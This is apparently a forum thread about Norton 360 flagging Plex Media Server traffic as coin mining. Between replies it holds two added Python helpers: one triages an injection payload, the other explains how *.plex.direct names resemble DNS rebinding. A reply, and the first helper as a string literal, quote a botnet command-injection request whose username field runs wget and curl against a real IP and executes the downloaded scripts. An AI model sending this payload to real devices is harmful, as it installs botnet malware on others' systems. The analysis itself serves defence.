Norton 360 suddenly saying Plex is coin mining & sending large amounts of data

So out of nowhere Norton is constantly blocking coin mining activity coming out of a Plex-like address on my computer and going to China! (screenshot attached).
Besides the target address ending in .plex.direct, I am also suspicious because the bombardment of warnings ceased after I manually shut down the server and left the computer running for over 8 hours.
In addition to this, Norton is warning me that a large amount of data is leaving my computer overnight… I thought maybe it was a false alarm due to Plex streaming and Norton seeing local streaming as something else, but now I'm not sure.
The calls to china are coming from “SYSTEM”.

Anyone got any ideas?

You didn’t include what PMS version you’re using …

Norton jokes aside, the connection is clearly being made, and to the suspect address. I'm Australian… I'm not trying to connect to China.

What is PMS? Relatively new to Plex, don't know the lingo yet.

Plex Media Server? It's 4.30.2 (the latest as far as I can tell; I check regularly, especially when troubleshooting).

Assuming I let this connection through, there must be a reason they are targeting a Plex address? Is there a vulnerability with these Plex addresses? I don't even know what an address ending in Plex does.

It’s Plex DNS rebinding. No need to worry, IMHO.

I hope Plex patches this method of rebinding as it really looks like an attack:

“/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://104.168.198.235/ffaWfg.sh -O 12.ffaWfg.sh;curl -O http://104.168.198.235/ffaWfg.sh -O 11.ffaWfg.sh; chmod 777 *; sh 11.ffaWfg.sh; sh 12.ffaWfg.sh)&password=admin”

Edit: looks like a modified botnet designed to sniff DVRs and IP cameras. Very similar code can be found halfway down the page here: https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/
I guess now it's been modified to sniff out Plex servers?
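A triage helper for a request like the one quoted in the post above, as an added example that is not part of the thread and not Plex or Norton code. It splits the query string, flags any parameter whose value carries shell syntax, lists the commands inside the `$(...)` substitution, and pulls out the URLs those commands fetch, which is what a defender would push to a blocklist or pivot on. The sample request is the one quoted above, reproduced as a Python literal; the function names and regular expressions are mine.

```python
"""Triage helper for command-injection payloads in HTTP query strings.

Added example; not from the thread and not Plex or Norton code. The sample
request is the one quoted in the post above; regexes and names are mine.
"""
import re
from urllib.parse import unquote_plus

_SUBSTITUTION = re.compile(r"\$\((.*?)\)", re.DOTALL)  # bodies of $( ... )
_METACHARS = re.compile(r"\$\(|`|;|\||&&|>")            # chaining/redirection
_URL = re.compile(r"https?://[^\s;)'\"<>]+")            # download targets

# Constructed from the request quoted in the post above (same characters,
# as a Python literal); the space before ';XmlAp' is part of the quote.
SAMPLE_REQUEST = (
    "/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80"
    "&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>"
    "$(cd /tmp; wget http://104.168.198.235/ffaWfg.sh -O 12.ffaWfg.sh;"
    "curl -O http://104.168.198.235/ffaWfg.sh -O 11.ffaWfg.sh; chmod 777 *;"
    " sh 11.ffaWfg.sh; sh 12.ffaWfg.sh)&password=admin"
)


def decode_query(request_path):
    """Split a request path into {param: value}.

    Splits on '&' only: older urllib.parse.parse_qsl also split on ';',
    which would shred exactly the injected shell we want to keep intact.
    """
    _, _, query = request_path.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def injected_commands(value):
    """Return the individual commands found inside $(...) blocks."""
    commands = []
    for body in _SUBSTITUTION.findall(value):
        commands.extend(c.strip() for c in body.split(";") if c.strip())
    return commands


def fetched_urls(value):
    """URLs the injected commands would download, de-duplicated in order."""
    seen = []
    for url in _URL.findall(value):
        if url not in seen:
            seen.append(url)
    return seen


def analyze_request(request_path):
    """Flag parameters carrying shell syntax and summarise what they do."""
    params = decode_query(request_path)
    flagged = [k for k, v in params.items() if _METACHARS.search(v)]
    commands, urls = [], []
    for key in flagged:
        commands.extend(injected_commands(params[key]))
        for url in fetched_urls(params[key]):
            if url not in urls:
                urls.append(url)
    return {"flagged_params": flagged, "commands": commands, "urls": urls}


if __name__ == "__main__":
    report = analyze_request(SAMPLE_REQUEST)
    print("flagged:", report["flagged_params"])
    print("urls:", report["urls"])
    for cmd in report["commands"]:
        print("  ", cmd)
```

On the quoted request this flags only `username`, recovers six chained commands (`cd /tmp` through `sh 12.ffaWfg.sh`) and a single download URL; a benign `Search.cgi` query with the same parameters but no shell syntax flags nothing.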

It’s not DNS rebinding. It is a perfectly legit way to use DNS. It is just that many protection routines cannot distinguish it from a rebinding attack.
Background: https://support.plex.tv/articles/206225077-how-to-use-secure-server-connections/
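An added example (not from the thread, and not Plex's or Norton's code) of why a `*.plex.direct` lookup trips a generic DNS-rebinding heuristic, and what a check that understands the scheme looks like. Plex's secure-connection scheme, described in the support article linked above, encodes the server's own IP address in the hostname (`192-168-1-10.<server-hash>.plex.direct` resolves to `192.168.1.10`), so a public DNS name deliberately resolves to a private address. Assumptions in this block: the IPv4-only form of the name, an alphanumeric hash label, and a constructed lookup table standing in for real DNS answers.

```python
"""Why a *.plex.direct lookup looks like DNS rebinding to a generic check.

Added example; not from the thread and not Plex or Norton code. The name
format is the IPv4 form described in Plex's secure-connections article;
the hash label format and the lookup table below are assumptions.
"""
import ipaddress
import re

# First label: four dash-separated octets; second label: the server hash
# (treated here as any alphanumeric string, an assumption about its format).
_PLEX_DIRECT = re.compile(
    r"^(?P<ip>\d{1,3}(?:-\d{1,3}){3})\.(?P<hash>[0-9a-z]+)\.plex\.direct$", re.I
)


def plex_direct_embedded_ip(hostname):
    """Return the IPv4 address a *.plex.direct name announces, else None."""
    m = _PLEX_DIRECT.match(hostname.rstrip(".").lower())
    if not m:
        return None
    try:
        return ipaddress.ip_address(m.group("ip").replace("-", "."))
    except ValueError:  # e.g. an octet above 255
        return None


def naive_rebinding_verdict(hostname, resolved_ip):
    """The heuristic many endpoint products apply: an external name that
    resolves to a private or loopback address is treated as rebinding."""
    addr = ipaddress.ip_address(resolved_ip)
    return addr.is_private or addr.is_loopback


def refined_verdict(hostname, resolved_ip):
    """Classify one name/answer pair.

    'expected-plex-direct': the name itself announced the private address it
                            resolved to, which is how plex.direct works.
    'mismatch':             a plex.direct name resolved to an address other
                            than the one it announces; worth investigating.
    'suspect':              ordinary name resolved to a private/loopback address.
    'ok':                   ordinary name resolved to a public address.
    """
    addr = ipaddress.ip_address(resolved_ip)
    embedded = plex_direct_embedded_ip(hostname)
    if embedded is not None:
        return "expected-plex-direct" if embedded == addr else "mismatch"
    return "suspect" if naive_rebinding_verdict(hostname, resolved_ip) else "ok"


# Constructed sample of (name, answer) pairs: the hash label is made up and
# the last two rows are placeholders, not observations about those hosts.
SAMPLE_LOOKUPS = [
    ("192-168-1-10.0123456789abcdef0123456789abcdef.plex.direct", "192.168.1.10"),
    ("192-168-1-10.0123456789abcdef0123456789abcdef.plex.direct", "10.0.0.5"),
    ("dns.google", "8.8.8.8"),
    ("updates.example.net", "127.0.0.1"),
]


def classify_all(lookups=SAMPLE_LOOKUPS):
    """Run both verdicts over the sample so the difference is visible."""
    return [
        (name, ip, naive_rebinding_verdict(name, ip), refined_verdict(name, ip))
        for name, ip in lookups
    ]


if __name__ == "__main__":
    for name, ip, naive, refined in classify_all():
        print(f"{name:60} -> {ip:14} naive={naive!s:5} refined={refined}")
```

The first row is the normal Plex case: the naive rule says "rebinding" while the refined rule sees that the name announced `192.168.1.10` and got `192.168.1.10`. The second row is the one case a plex.direct-aware check should still raise: the answer does not match the address in the name.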
